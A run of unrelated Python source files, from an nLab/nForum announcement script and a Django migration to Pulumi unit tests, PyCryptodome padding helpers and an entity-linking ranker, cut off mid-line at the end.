"Name of created nLab page") parser_create_page.add_argument( "latest_changes_web_name", help = ( "Name of web to which the created nLab page belongs, as " + "displayed in the nForum latest changes category name")) parser_create_page.add_argument( "web_id", help = "ID of web to which the created nLab page belongs") parser_create_page.add_argument( "announcement", help = "Comments on the created nLab page") parser_create_page.add_argument( "author", help = "Author of the created nLab page") parser_edit_page.add_argument( "nlab_page_name", help = "Name of edited nLab page. If the edit involves a change " + "in the name of the page, this should be the new name of the " + "page") parser_edit_page.add_argument( "latest_changes_web_name", help = ( "Name of web to which the edited nLab page belongs, as " + "displayed in the nForum latest changes category name")) parser_edit_page.add_argument( "web_id", help = "ID of web to which the edited nLab page belongs") parser_edit_page.add_argument( "announcement", help = "Comments on the edited nLab page") parser_edit_page.add_argument( "author", help = "Author of the edited nLab page") parser_edit_page.add_argument( "page_id", help = "ID of the edited nLab page") parser_edit_page.add_argument( "-o", "--old_page_name", help = ( "Old page name for the edited nLab page if the edit involves " + "a name change")) parser_edit_page.add_argument( "--is_trivial", action = "store_true", help = "Indicate that the edit was trivial") return parser def main(): parser = argument_parser() arguments = parser.parse_args() nlab_page_name = arguments.nlab_page_name latest_changes_web_name = arguments.latest_changes_web_name web_id = arguments.web_id announcement = arguments.announcement author = arguments.author failure_message = None try: user_id, local_id = nforum_user_id(author) found_nforum_user = True except NoNForumUserCorrespondingToNLabAuthorException: user_id = _ForumPostParameters._nlab_edit_announcer_user_id local_id = _ForumPostParameters._nlab_edit_announcer_local_user_id found_nforum_user = False if arguments.subcommand == "create": forum_post_parameters = _CreateForumPostParameters( nlab_page_name, latest_changes_web_name, web_id, user_id, local_id, author, announcement) try: forum_post_parameters.create_discussion_and_post_to_it( forum_post_parameters.nforum_announcement(found_nforum_user)) logger.info( "Successfully made nForum discussion for newly created nLab " + "page with name: " + nlab_page_name + ". Author: " + author + ". Web id: " + str(web_id)) except FailedToCarryOutQueryException: logger.warning( "Due to a database error, could not make nForum discussion " + "for newly created nLab page with name: " + nlab_page_name + ". Author: " + author + ". Web id: " + str(web_id) + ". Announcement: " + announcement) failure_message = "Failed to make nForum discussion" except Exception as e: logger.warning( "Due to an unforeseen error, could not make nForum " + "discussion for newly created nLab page with name: " + nlab_page_name + ". Author: " + author + ". Web id: " + str(web_id) + ". Announcement: " + announcement + ". Error: " + str(e)) failure_message = "Failed to make nForum discussion" else: if arguments.is_trivial: logger.info( "Trivial edit made to " + arguments.nlab_page_name + " in web with id " + str(web_id) + " by " + author + " at " + str(datetime.datetime.utcnow().replace(microsecond=0)) + " UTC") return forum_post_parameters =_EditForumPostParameters( nlab_page_name, latest_changes_web_name, web_id, user_id, local_id, author, announcement, arguments.page_id) old_page_name = arguments.old_page_name try: if old_page_name: forum_post_parameters.post_with_name_change( found_nforum_user, old_page_name) logger.info( "Successfully made nForum post for newly edited nLab " + "page with name: " + nlab_page_name + ". Author: " + author + ". Web id: " + str(web_id)) else: forum_post_parameters.post(found_nforum_user) logger.info( "Successfully made nForum post for newly edited nLab " + "page with name: " + nlab_page_name + ". Author: " + author + ". Web id: " + str(web_id)) except FailedToCarryOutQueryException: log_message = ( "Due to a database error, could not make nForum post for " + "newly edited nLab page with name: " + nlab_page_name + ". Author: " + author + ". Web id: " + str(web_id)) if old_page_name: log_message = log_message + ( ". Change of page name from " + old_page_name + " to " + nlab_page_name) log_message = log_message + ( ". Announcement: " + announcement) logger.warning(log_message) overall_failure_message = ( "Failed to make nForum post to the discussion for the " + "edited nLab page") except Exception as e: log_message = ( "Due to an unforeseen error, could not make nForum post for " + "newly edited nLab page with name: " + nlab_page_name + ". Author: " + author + ". Web id: " + str(web_id)) if old_page_name: log_message = log_message + ( ". Change of page name from " + old_page_name + " to " + nlab_page_name) log_message = log_message + ( ". Announcement: " + announcement + " Error: " + str(e)) logger.warning(log_message) failure_message = ( "Failed to make nForum post to the discussion for the " + "edited nLab page") if failure_message is not None: sys.exit(failure_message) if __name__ == "__main__": main()
from argparse import ArgumentParser # noinspection PyProtectedMember class CommandParser(ArgumentParser): def __init__( self, name=None, aliases=None, py_function=None, subcommands=None, short_description=None, **kwargs ): self.name = name if isinstance(aliases, str): aliases = [aliases] self.aliases = [] if aliases is None else aliases self.py_function = py_function if subcommands is None: subcommands = [] elif not hasattr(subcommands, '__iter__'): subcommands = [subcommands] self.subcommands = subcommands # if a short description isn't provided, # use the default description (if that was provided) if short_description is None: short_description = kwargs.get('description') self.short_description = short_description self.subcommand_parsers = None self._default_subcommand = None super().__init__(**kwargs) # set correct usage info for subcommands for cmd in self.subcommands: cmd.prog = f"{self.prog} {cmd.name}" def __eq__(self, other): return other in self.all_names @property def all_names(self): return (self.name, *self.aliases) @property def default_subcommand(self): return self._default_subcommand @default_subcommand.setter def default_subcommand(self, cmd): if cmd not in self.subcommands: raise ValueError("default subcommand must be an available subcommand") self._default_subcommand = self.subcommands[self.subcommands.index(cmd)] @default_subcommand.getter def get_default_subcommand(self): if self._default_subcommand is not None: return self._default_subcommand else: raise ValueError("default subcommand not set") @staticmethod def _format_subcmd_help(cmd, formatter): # determine the required width and the entry label help_position = min(formatter._action_max_length + 2, formatter._max_help_position) help_width = max(formatter._width - help_position, 11) cmd_width = help_position - formatter._current_indent - 2 cmd_header = cmd_str = ', '.join(cmd.all_names) tup = formatter._current_indent, '', cmd_width, cmd_header cmd_header = '%*s%-*s ' % tup indent_first = 0 # add lines of help text (from cmd.short_description) help_text = cmd.short_description help_lines = formatter._split_lines(help_text, help_width) parts = [cmd_header] parts.append('%*s%s\n' % (indent_first, '', help_lines[0])) for line in help_lines[1:]: parts.append('%*s%s\n' % (help_position, '', line)) return formatter._join_parts(parts) def format_help(self): # overrides argparse.ArgumentParser's `format_help` function to # include subcommand info with custom help formatting formatter = self._get_formatter() # format usage formatter.add_usage( self.usage, self._actions, self._mutually_exclusive_groups ) # format description formatter.add_text(self.description) # add existing groups first (in this case, "optional arguments") for action_group in self._action_groups: formatter.start_section(action_group.title) formatter.add_text(action_group.description) formatter.add_arguments(action_group._group_actions) formatter.end_section() # SUBCOMMAND CUSTOM HELP FORMATTING if any(self.subcommands): formatter.start_section("commands") for cmd in self.subcommands: cmd_str = ', '.join(cmd.all_names) cmd_len = len(cmd_str) + formatter._current_indent formatter._action_max_length = max(formatter._action_max_length, cmd_len) formatter._add_item(self._format_subcmd_help, (cmd, formatter)) formatter.end_section() # format epilogue section formatter.add_text(self.epilog) # format full help output return formatter.format_help() def run(self, raw_args): try: cmd = raw_args[0] except IndexError: # no positional or optional args were passed try: # use the default subcommand cmd = self.get_default_subcommand except ValueError: # no default subcommand set cmd = None try: # Pass remaining args to the subcommand's CommandParser # (prevents argparse from consuming args meant for # subcommands like `--help/-h`) subcmd = self.subcommands[self.subcommands.index(cmd)] subcmd.run(raw_args[1:]) except ValueError: # the args either belong to the present command or invalid parsed_args = self.parse_args(raw_args) self.py_function(**vars(parsed_args))
# -*- coding: utf-8 -*- from openprocurement.tender.core.views.complaint import BaseTenderComplaintResource from openprocurement.api.utils import get_now from openprocurement.tender.core.utils import optendersresource from openprocurement.tender.openua.validation import validate_update_claim_time from openprocurement.tender.openuadefense.validation import validate_submit_claim_time @optendersresource( name="aboveThresholdUA.defense:Tender Complaints", collection_path="/tenders/{tender_id}/complaints", path="/tenders/{tender_id}/complaints/{complaint_id}", procurementMethodType="aboveThresholdUA.defense", description="Tender complaints", ) class TenderUaComplaintResource(BaseTenderComplaintResource): patch_check_tender_excluded_statuses = ( "draft", "claim", "answered", "pending", "accepted", "stopping", ) @staticmethod def validate_submit_claim_time_method(request): return validate_submit_claim_time(request) @staticmethod def validate_update_claim_time_method(request): return validate_update_claim_time(request) def pre_create(self): complaint = self.request.validated["complaint"] if complaint.status == "claim": self.validate_submit_claim_time_method(self.request) elif complaint.status == "pending": self.validate_submit_claim_time_method(self.request) complaint.dateSubmitted = get_now() complaint.type = "complaint" else: complaint.status = "draft" return complaint
from __future__ import absolute_import, unicode_literals from django.conf.urls import include, url from graphene_django.views import GraphQLView from wagtail.contrib.wagtailsitemaps import views as sitemaps_views from wagtail.contrib.wagtailsitemaps import Sitemap from wagtail.wagtailadmin import urls as wagtailadmin_urls from wagtail.wagtailcore import urls as wagtail_urls from wagtail.wagtailimages import urls as wagtailimages_urls from wagtail.wagtailsearch import urls as wagtailsearch_urls urlpatterns = [ url(r'^admin/', include(wagtailadmin_urls)), url(r'^search/', include(wagtailsearch_urls)), url(r'^images/', include(wagtailimages_urls)), url(r'^graphql', GraphQLView.as_view(graphiql=True)), url(r'^sitemap\.xml$', sitemaps_views.sitemap), url(r'^sitemap-index\.xml$', sitemaps_views.index, { 'sitemaps': {'pages': Sitemap}, 'sitemap_url_name': 'sitemap', }), url(r'^sitemap-(?P<section>.+)\.xml$', sitemaps_views.sitemap, name='sitemap'), # For anything not caught by a more specific rule above, hand over to # Wagtail's serving mechanism url(r'', include(wagtail_urls)), ]
import random a1 = input('Primeiro Aluno:') a2 = input('Segundo Aluno:') a3 = input('Terceiro aluno:') a4 = input('Quarto aluno:') lista = [a1, a2, a3, a4] random.shuffle(lista) print('A ordem sera:') print(lista)
import maglica.request_log import maglica.util from termcolor import cprint import json def status(args): options = { "mandatory": ["id"], "optional": [], } maglica.util.check_args(args, options) request_log = maglica.request_log.RequestLog() row = request_log.get_status(args["id"]) _print(row) def tail(args): request_log = maglica.request_log.RequestLog() rows = request_log.tail() for row in rows: _print(row) def _print(row): status = row["status"] args = json.loads(row["args"]) message = row["message"] if status == 0: cprint("In progress", "yellow") options = [] for key in args["args"].keys(): options.append("--%s=%s" % (key, args["args"][key])) options = " ".join(options) log = "Running %s %s %s" % (args["type"], args["action"], options) if args.has_key("host"): log = "%s on %s" % (log, args["host"]) print log elif status == 1: cprint("Completed", "green") elif status == 2: cprint("Error", "red") if message: print message
from ._version import __version__ from .Azure_Hbase import AzHbaseRestAPI from .utils import df_to_dict from .utils import base64_to_string from .utils import string_to_base64
# Generated by Django 3.0.8 on 2020-08-31 16:47 from django.conf import settings from django.db import migrations, models import django.db.models.deletion import django.utils.timezone class Migration(migrations.Migration): initial = True dependencies = [ ('auth', '0011_update_proxy_permissions'), ] operations = [ migrations.CreateModel( name='User', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('password', models.CharField(max_length=128, verbose_name='password')), ('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')), ('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')), ('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')), ('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active')), ('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')), ('email', models.EmailField(max_length=255, unique=True, verbose_name='Email')), ('name', models.CharField(max_length=100)), ('last_seen', models.DateTimeField()), ('room_joined_on', models.DateTimeField(default=None, null=True)), ('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')), ], options={ 'verbose_name': 'user', 'verbose_name_plural': 'users', 'abstract': False, }, ), migrations.CreateModel( name='Artist', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.CharField(max_length=255)), ], ), migrations.CreateModel( name='Room', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('created_on', models.DateTimeField()), ('is_paused', models.BooleanField(default=False)), ('paused_on', models.DateTimeField(default=None, null=True)), ('duration_to_complete', models.TimeField()), ('play_start_time', models.DateTimeField()), ('no_tracks', models.IntegerField(default=0)), ('code', models.CharField(default=None, max_length=50, null=True)), ('access_users', models.ManyToManyField(related_name='access_to_rooms', to=settings.AUTH_USER_MODEL)), ], ), migrations.CreateModel( name='Track', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('added_on', models.DateTimeField()), ('title', models.CharField(max_length=255)), ('artists', models.CharField(max_length=255)), ('duration', models.TimeField()), ('plays_count', models.IntegerField()), ('ref_id', models.CharField(default=None, max_length=255, null=True)), ('storage_bucket', models.CharField(max_length=255)), ('playback_path', models.CharField(max_length=255)), ('image_path', models.CharField(default=None, max_length=255, null=True)), ], ), migrations.CreateModel( name='RoomTrack', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('added_on', models.DateTimeField()), ('next_roomtrack', models.OneToOneField(default=None, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='previous_roomtrack', to='musicroom.RoomTrack')), ('room', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='roomtracks', to='musicroom.Room')), ('track', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='+', to='musicroom.Track')), ], ), migrations.AddField( model_name='room', name='current_roomtrack', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='+', to='musicroom.RoomTrack'), ), migrations.AddField( model_name='user', name='room', field=models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='members', to='musicroom.Room'), ), migrations.AddField( model_name='user', name='user_permissions', field=models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions'), ), migrations.CreateModel( name='Friendship', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('init_on', models.DateTimeField()), ('is_accepted', models.BooleanField()), ('accepted_on', models.DateTimeField(default=None, null=True)), ('score', models.IntegerField()), ('common_time', models.TimeField()), ('user1', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user1_set', to=settings.AUTH_USER_MODEL)), ('user2', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user2_set', to=settings.AUTH_USER_MODEL)), ], options={ 'unique_together': {('user1', 'user2')}, }, ), ]
import os, sys, struct import ctypes import ctypes.util from functools import wraps from typing import Callable, TypeVar import logging logger = logging.getLogger(__name__) LibCall = TypeVar("LibCall") def lookup_dll(prefix): paths = os.environ.get("PATH", "").split(os.pathsep) for path in paths: if not os.path.exists(path): continue for name in os.listdir(path): if name.startswith(prefix) and name.lower().endswith(".dll"): return os.path.join(path, name) return None def unix_find_lib(name): cuda_path = os.environ.get("CUDA_PATH", None) if cuda_path is not None: lib_name = os.path.join(cuda_path, "lib64", "lib%s.so" % name) if os.path.exists(lib_name): return lib_name cuda_path = "/usr/local/cuda" if cuda_path is not None: lib_name = os.path.join(cuda_path, "lib64", "lib%s.so" % name) if os.path.exists(lib_name): return lib_name lib_name = ctypes.util.find_library(name) return lib_name def windows_find_lib(name): lib_name = "%s%d_" % (name, struct.calcsize("P") * 8) return lookup_dll(lib_name) class Lib: def __init__(self, name): self.__name = name if sys.platform.startswith("win"): lib_path = windows_find_lib(self.__name) self.__lib_path = lib_path if lib_path is not None: self.__lib = ctypes.WinDLL(lib_path) else: self.__lib = None elif sys.platform.startswith("linux"): lib_path = unix_find_lib(self.__name) self.__lib_path = lib_path if lib_path is not None: self.__lib = ctypes.cdll.LoadLibrary(lib_path) else: self.__lib = None else: raise RuntimeError("Unknown platform: %s" % sys.platform) @staticmethod def from_lib(name, lib): ret = Lib(name) ret.__lib = lib return ret def bind(self, name, arg_types, ret_type) -> Callable[[LibCall], LibCall]: if self.__lib is None: def decorator(f): @wraps(f) def wrapper(*args, **kwargs): raise RuntimeError("Library %s is not initialized" % self.__name) return wrapper return decorator else: try: func = getattr(self.__lib, name) except AttributeError: # Name not found in library def decorator(f): @wraps(f) def wrapper(*args, **kwargs): raise AttributeError("%s: undefined symbol: %s" % (self.__lib_path, name)) return wrapper logger.warning("Symbol %s not found in %s", name, self.__lib_path) return decorator func.argtypes = arg_types func.restype = ret_type setattr(self, name, func) def decorator(f): @wraps(f) def wrapper(*args, **kwargs): return f(*args, **kwargs) return wrapper return decorator
# Copyright 2016-2020, Pulumi Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import unittest from typing import Optional import pulumi import pulumi._types as _types CAMEL_TO_SNAKE_CASE_TABLE = { "firstValue": "first_value", "secondValue": "second_value", } @pulumi.output_type class MyOutputType: first_value: str = pulumi.property("firstValue") second_value: Optional[float] = pulumi.property("secondValue", default=None) @pulumi.output_type class MyOutputTypeDict(dict): first_value: str = pulumi.property("firstValue") second_value: Optional[float] = pulumi.property("secondValue", default=None) @pulumi.output_type class MyOutputTypeTranslated: first_value: str = pulumi.property("firstValue") second_value: Optional[float] = pulumi.property("secondValue", default=None) def _translate_property(self, prop): return CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop @pulumi.output_type class MyOutputTypeDictTranslated(dict): first_value: str = pulumi.property("firstValue") second_value: Optional[float] = pulumi.property("secondValue", default=None) def _translate_property(self, prop): return CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop @pulumi.output_type class MyDeclaredPropertiesOutputType: def __init__(self, first_value: str, second_value: Optional[float] = None): pulumi.set(self, "first_value", first_value) if second_value is not None: pulumi.set(self, "second_value", second_value) # Property with empty body. @property @pulumi.getter(name="firstValue") def first_value(self) -> str: """First value docstring.""" ... # Property with implementation. @property @pulumi.getter(name="secondValue") def second_value(self) -> Optional[float]: """Second value docstring.""" return pulumi.get(self, "second_value") @pulumi.output_type class MyDeclaredPropertiesOutputTypeDict(dict): def __init__(self, first_value: str, second_value: Optional[float] = None): pulumi.set(self, "first_value", first_value) if second_value is not None: pulumi.set(self, "second_value", second_value) # Property with empty body. @property @pulumi.getter(name="firstValue") def first_value(self) -> str: """First value docstring.""" ... # Property with implementation. @property @pulumi.getter(name="secondValue") def second_value(self) -> Optional[float]: """Second value docstring.""" return pulumi.get(self, "second_value") @pulumi.output_type class MyDeclaredPropertiesOutputTypeTranslated: def __init__(self, first_value: str, second_value: Optional[float] = None): pulumi.set(self, "first_value", first_value) if second_value is not None: pulumi.set(self, "second_value", second_value) # Property with empty body. @property @pulumi.getter(name="firstValue") def first_value(self) -> str: """First value docstring.""" ... # Property with implementation. @property @pulumi.getter(name="secondValue") def second_value(self) -> Optional[float]: """Second value docstring.""" return pulumi.get(self, "second_value") def _translate_property(self, prop): return CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop @pulumi.output_type class MyDeclaredPropertiesOutputTypeDictTranslated(dict): def __init__(self, first_value: str, second_value: Optional[float] = None): pulumi.set(self, "first_value", first_value) if second_value is not None: pulumi.set(self, "second_value", second_value) # Property with empty body. @property @pulumi.getter(name="firstValue") def first_value(self) -> str: """First value docstring.""" ... # Property with implementation. @property @pulumi.getter(name="secondValue") def second_value(self) -> Optional[float]: """Second value docstring.""" return pulumi.get(self, "second_value") def _translate_property(self, prop): return CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop class InputTypeTests(unittest.TestCase): def test_decorator_raises(self): with self.assertRaises(AssertionError) as cm: @pulumi.output_type @pulumi.input_type class Foo: pass with self.assertRaises(AssertionError) as cm: @pulumi.output_type @pulumi.input_type class Bar: pass def test_is_output_type(self): types = [ MyOutputType, MyOutputTypeDict, MyOutputTypeTranslated, MyOutputTypeDictTranslated, MyDeclaredPropertiesOutputType, MyDeclaredPropertiesOutputTypeDict, MyDeclaredPropertiesOutputTypeTranslated, MyDeclaredPropertiesOutputTypeDictTranslated, ] for typ in types: self.assertTrue(_types.is_output_type(typ)) self.assertEqual(True, typ._pulumi_output_type) self.assertTrue(hasattr(typ, "__init__")) def test_output_type_types(self): self.assertEqual({ "firstValue": str, "secondValue": float, }, _types.output_type_types(MyOutputType)) def test_output_type(self): types = [ (MyOutputType, False), (MyOutputTypeDict, False), (MyOutputTypeTranslated, False), (MyOutputTypeDictTranslated, False), (MyDeclaredPropertiesOutputType, True), (MyDeclaredPropertiesOutputTypeDict, True), (MyDeclaredPropertiesOutputTypeTranslated, True), (MyDeclaredPropertiesOutputTypeDictTranslated, True), ] for typ, has_doc in types: self.assertTrue(hasattr(typ, "__init__")) t = _types.output_type_from_dict(typ, {"firstValue": "hello", "secondValue": 42}) self.assertEqual("hello", t.first_value) self.assertEqual(42, t.second_value) if isinstance(t, dict): self.assertEqual("hello", t["first_value"]) self.assertEqual(42, t["second_value"]) first = typ.first_value self.assertIsInstance(first, property) self.assertTrue(callable(first.fget)) self.assertEqual("first_value", first.fget.__name__) self.assertEqual({"return": str}, first.fget.__annotations__) if has_doc: self.assertEqual("First value docstring.", first.fget.__doc__) self.assertEqual("firstValue", first.fget._pulumi_name) second = typ.second_value self.assertIsInstance(second, property) self.assertTrue(callable(second.fget)) self.assertEqual("second_value", second.fget.__name__) self.assertEqual({"return": Optional[float]}, second.fget.__annotations__) if has_doc: self.assertEqual("Second value docstring.", second.fget.__doc__) self.assertEqual("secondValue", second.fget._pulumi_name) self.assertTrue(hasattr(t, "__eq__")) self.assertTrue(t.__eq__(t)) self.assertTrue(t == t) self.assertFalse(t != t) self.assertFalse(t == "not equal") t2 = _types.output_type_from_dict(typ, {"firstValue": "hello", "secondValue": 42}) self.assertTrue(t.__eq__(t2)) self.assertTrue(t == t2) self.assertFalse(t != t2) if isinstance(t2, dict): self.assertEqual("hello", t2["first_value"]) self.assertEqual(42, t2["second_value"]) t3 = _types.output_type_from_dict(typ, {"firstValue": "foo", "secondValue": 1}) self.assertFalse(t.__eq__(t3)) self.assertFalse(t == t3) self.assertTrue(t != t3) if isinstance(t3, dict): self.assertEqual("foo", t3["first_value"]) self.assertEqual(1, t3["second_value"])
# # -*- coding: utf-8 -*- # # Util/Padding.py : Functions to manage padding # # =================================================================== # The contents of this file are dedicated to the public domain. To # the extent that dedication to the public domain is not available, # everyone is granted a worldwide, perpetual, royalty-free, # non-exclusive license to exercise all rights associated with the # contents of this file for any purpose whatsoever. # No rights are reserved. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS # BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN # ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN # CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # =================================================================== """ Functions to manage padding This module provides minimal support for adding and removing standard padding from data. """ __all__ = [ 'ValueError', 'pad', 'unpad' ] from Crypto.Util.py3compat import * def pad(data_to_pad, block_size, style='pkcs7'): """Apply standard padding. :Parameters: data_to_pad : byte string The data that needs to be padded. block_size : integer The block boundary to use for padding. The output length is guaranteed to be a multiple of ``block_size``. style : string Padding algorithm. It can be *'pkcs7'* (default), *'iso7816'* or *'x923'*. :Return: The original data with the appropriate padding added at the end. """ padding_len = block_size-len(data_to_pad)%block_size if style == 'pkcs7': padding = bchr(padding_len)*padding_len elif style == 'x923': padding = bchr(0)*(padding_len-1) + bchr(padding_len) elif style == 'iso7816': padding = bchr(128) + bchr(0)*(padding_len-1) else: raise ValueError("Unknown padding style") return data_to_pad + padding def unpad(padded_data, block_size, style='pkcs7'): """Remove standard padding. :Parameters: padded_data : byte string A piece of data with padding that needs to be stripped. block_size : integer The block boundary to use for padding. The input length must be a multiple of ``block_size``. style : string Padding algorithm. It can be *'pkcs7'* (default), *'iso7816'* or *'x923'*. :Return: Data without padding. :Raises ValueError: if the padding is incorrect. """ pdata_len = len(padded_data) if pdata_len % block_size: raise ValueError("Input data is not padded") if style in ('pkcs7', 'x923'): padding_len = bord(padded_data[-1]) if padding_len<1 or padding_len>min(block_size, pdata_len): raise ValueError("Padding is incorrect.") if style == 'pkcs7': if padded_data[-padding_len:]!=bchr(padding_len)*padding_len: raise ValueError("PKCS#7 padding is incorrect.") else: if padded_data[-padding_len:-1]!=bchr(0)*(padding_len-1): raise ValueError("ANSI X.923 padding is incorrect.") elif style == 'iso7816': padding_len = pdata_len - padded_data.rfind(bchr(128)) if padding_len<1 or padding_len>min(block_size, pdata_len): raise ValueError("Padding is incorrect.") if padding_len>1 and padded_data[1-padding_len:]!=bchr(0)*(padding_len-1): raise ValueError("ISO 7816-4 padding is incorrect.") else: raise ValueError("Unknown padding style") return padded_data[:-padding_len]
import nel.ntee as ntee from nel.vocabulary import Vocabulary import torch from torch.autograd import Variable import torch.nn.functional as F import numpy as np import nel.dataset as D from tqdm import tqdm from nel.abstract_word_entity import load as load_model from nel.mulrel_ranker import MulRelRanker from nel.first_selection import choose_cands import nel.utils as utils from random import shuffle import torch.optim as optim from pprint import pprint from hanziconv import HanziConv import jieba import time import pickle ModelClass = MulRelRanker wiki_prefix = 'en.wikipedia.org/wiki/' preprocessing_path = 'nel/preprocessing/' class EDRanker: """ ranking candidates """ def __init__(self, config): print('--- create model ---') config['entity_embeddings'] = config['entity_embeddings'] / \ np.maximum(np.linalg.norm(config['entity_embeddings'], axis=1, keepdims=True), 1e-12) config['entity_embeddings'][config['entity_voca'].unk_id] = 1e-10 config['word_embeddings'] = config['word_embeddings'] / \ np.maximum(np.linalg.norm(config['word_embeddings'], axis=1, keepdims=True), 1e-12) config['word_embeddings'][config['word_voca'].unk_id] = 1e-10 print('prerank model') self.prerank_model = ntee.NTEE(config) self.args = config['args'] print('main model') # by Cheng if self.args.mode == 'pretrain': self.model = pretrain_cands(config) elif self.args.mode == 'eval': print('try loading model from', self.args.model_path) self.model = load_model(self.args.model_path, ModelClass) else: print('create new model') if config['mulrel_type'] == 'rel-norm': config['use_stargmax'] = False if config['mulrel_type'] == 'ment-norm': config['first_head_uniform'] = False config['use_pad_ent'] = True config['use_local'] = True config['use_local_only'] = False config['oracle'] = False self.model = ModelClass(config) self.prerank_model.cuda() self.model.cuda() def prerank(self, dataset, predict=False): new_dataset = [] has_gold = 0 total = 0 f = 0 for content in dataset: #content is a doc(include mentions) items = [] f+=1 if self.args.keep_ctx_ent > 0: # rank the candidates by ntee scores lctx_ids = [m['context'][0][max(len(m['context'][0]) - self.args.prerank_ctx_window // 2, 0):] for m in content] rctx_ids = [m['context'][1][:min(len(m['context'][1]), self.args.prerank_ctx_window // 2)] for m in content] ment_ids = [[] for m in content] #meaning? token_ids = [l + m + r if len(l) + len(r) > 0 else [self.prerank_model.word_voca.unk_id] for l, m, r in zip(lctx_ids, ment_ids, rctx_ids)] #combine all the left right context wiki id entity_ids = [m['cands'] for m in content] entity_ids = Variable(torch.LongTensor(entity_ids).cuda()) entity_mask = [m['mask'] for m in content] entity_mask = Variable(torch.FloatTensor(entity_mask).cuda()) token_ids, token_offsets = utils.flatten_list_of_lists(token_ids) token_offsets = Variable(torch.LongTensor(token_offsets).cuda()) token_ids = Variable(torch.LongTensor(token_ids).cuda()) log_probs = self.prerank_model.forward(token_ids, token_offsets, entity_ids, use_sum=True) log_probs = (log_probs * entity_mask).add_((entity_mask - 1).mul_(1e10)) #use mask to let the unk_id won't be choose #topk will return (score,order of the score) #so the model didn't use the log_prob to train the model just choose the candidates _, top_pos = torch.topk(log_probs, dim=1, k=self.args.keep_ctx_ent) top_pos = top_pos.data.cpu().numpy() else: top_pos = [[]] * len(content) # select candidats: mix between keep_ctx_ent best candidates (ntee scores) with # keep_p_e_m best candidates (p_e_m scores) for i, m in enumerate(content): #so m means the mention of this doc sm = {'cands': [], 'named_cands': [], 'p_e_m': [], 'mask': [], 'true_pos': -1} m['selected_cands'] = sm selected = set(top_pos[i]) idx = 0 while len(selected) < self.args.keep_ctx_ent + self.args.keep_p_e_m: if idx not in selected: selected.add(idx) idx += 1 selected = sorted(list(selected)) for idx in selected: sm['cands'].append(m['cands'][idx]) sm['named_cands'].append(m['named_cands'][idx]) sm['p_e_m'].append(m['p_e_m'][idx]) sm['mask'].append(m['mask'][idx]) if idx == m['true_pos']: sm['true_pos'] = len(sm['cands']) - 1 if not predict: if sm['true_pos'] == -1: continue # this insertion only makes the performance worse (why???) # sm['true_pos'] = 0 # sm['cands'][0] = m['cands'][m['true_pos']] # sm['named_cands'][0] = m['named_cands'][m['true_pos']] # sm['p_e_m'][0] = m['p_e_m'][m['true_pos']] # sm['mask'][0] = m['mask'][m['true_pos']] items.append(m) if sm['true_pos'] >= 0: has_gold += 1 total += 1 if predict: # only for oracle model, not used for eval if sm['true_pos'] == -1: sm['true_pos'] = 0 # a fake gold, happens only 2%, but avoid the non-gold if len(items) > 0: new_dataset.append(items) print('recall', has_gold / total) return new_dataset def get_data_items(self, dataset, data_name, predict=False): data = [] cand_source = 'candidates' save_cands = {} # save preprocessing (cheng) tStart = time.time() for doc_name, content in tqdm(dataset.items()): items = [] conll_doc = content[0].get('conll_doc', None) chosed = choose_cands().ment_cos(content, self.args.cands_threshold, self.args.keep_top, self.args.n_cands_before_rank) content_tmp = [] # save preprocessing (cheng) for m in content: named_cands = chosed[m['mention']]['named_cands'] p_e_m = chosed[m['mention']]['p_e_m'] gt_pos = [c[0] for c in m['candidates']] gt_p_e_m = [min(1., max(1e-3, c[1])) for c in m['candidates']] named_cands_t = [] # avoid variable to change dict value named_cands_t += chosed[m['mention']]['named_cands'] p_e_m_t = [] # avoid variable to change dict value p_e_m_t += chosed[m['mention']]['p_e_m'] try: true_pos = 